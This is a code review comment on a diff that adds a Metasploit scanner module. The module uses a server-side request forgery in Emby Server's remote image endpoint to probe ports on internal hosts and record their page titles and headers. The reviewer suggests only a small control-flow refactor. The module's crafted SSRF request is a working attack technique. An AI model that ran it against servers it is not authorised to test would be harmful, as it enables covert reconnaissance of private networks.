modules/auxiliary/scanner/emby_ssrf_scanner.rb

```diff
@@ -0,0 +1,105 @@
+        OptInt.new('EMBY_PORT', [true, 'Web UI port for Emby Server (e.g. 8096)', '8096']),
+        OptString.new('PORTS', [true, 'Ports to scan (e.g. 22-25,80,110-900)', '80,8080,8081,8888'])
+      ]
+    )
+  end
+
+  def run_host(target_host)
+    # Do some checking to ensure data is submitted
+    # Also converts ports string to list
+    dports = Rex::Socket.portspec_crack(datastore['PORTS'])
+    raise Msf::OptionValidateError, ['PORTS'] if dports.empty?
+
+    # loop through the IPs
+    dports.each do |p|
+      vprint_status("Attempting SSRF with target #{target_host}:#{p}")
+      uri = "/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://#{target_host}:#{p}"
+      res = Net::HTTP.get_response(datastore['EMBY_SERVER'], uri, datastore['EMBY_PORT'])
+
+#      res = send_request_cgi({
+#        'method' => 'GET',
+#        'uri' =>  datastore['EMBY_SERVER'] + ":" + datastore['EMBY_PORT'].to_s + "/Items/RemoteSearch/Image?",
+#        'vars_get' => {
+#          'ProviderName' => 'TheMovieDB',
+#          'ImageURL' => "#{target_host}:#{p}"
+#        }
+#      })
+
+      # Check for Response
+      if res.nil?
+        vprint_error("http://#{target_host}:#{p} - No response")
+        next
+      end
+
+      # Retrieve the headers to capture the Location and Server header
+      server_header = res['server']
+      location_header = res['location']
+
+      # Check to see if the captured headers are populated
+      if server_header == nil && location_header == nil
+        vprint_error("#{target_host}:#{p} No HTTP headers")
+      end
+
+      # If the body is blank, just stop now as there is no chance of a title
+      vprint_error("#{target_host}:#{p} No webpage body") if res.body.nil?
+
+      # Very basic, just match the first title tag we come to. If the match fails,
+      # there is no chance that we will have a title
+      rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*</title>}im.match(res.body.to_s)
+      unless rx
+        vprint_error("#{target_host}:#{p} No webpage title")
+        next
+      end
+
+      # Last bit of logic to capture the title
+      rx[:title].strip!
+      if !rx[:title].empty?
+        rx_title = Rex::Text.html_decode(rx[:title])
+        if datastore['SHOW_TITLES']
+          print_good("#{target_host}:#{p} Title: #{rx_title}")
+          print_good("#{target_host}:#{p}     HTTP Code: #{res.code}")
+          print_good("#{target_host}:#{p}     Location Header: #{location_header}")
+          print_good("#{target_host}:#{p}     Server Header: #{server_header}")
+        end
+        if datastore['STORE_NOTES']
+          notedata = { code: res.code, port: p, server: server_header, title: rx_title, redirect: location_header }
+          report_note(host: target_host, port: p, type: 'http.title', data: notedata, update: :unique_data)
+        end
+      else
+        vprint_error("#{target_host}:#{p} No webpage title")
+        next
+      end
```

Comment:
I would slightly re-arrange this.
```
      if rx[:title].empty?
        vprint_error("#{target_host}:#{p} No webpage title")
        next
      end     

      rx_title = Rex::Text.html_decode(rx[:title])
      if datastore['SHOW_TITLES']
        print_good("#{target_host}:#{p} Title: #{rx_title}")
        print_good("#{target_host}:#{p}     HTTP Code: #{res.code}")
        print_good("#{target_host}:#{p}     Location Header: #{location_header}")
        print_good("#{target_host}:#{p}     Server Header: #{server_header}")
      end
      if datastore['STORE_NOTES']
        notedata = { code: res.code, port: p, server: server_header, title: rx_title, redirect: location_header }
        report_note(host: target_host, port: p, type: 'http.title', data: notedata, update: :unique_data)
      end
```

Bails early, unindents a block of code. Also avoids `if not empty` for `if empty` which is slightly less double negative.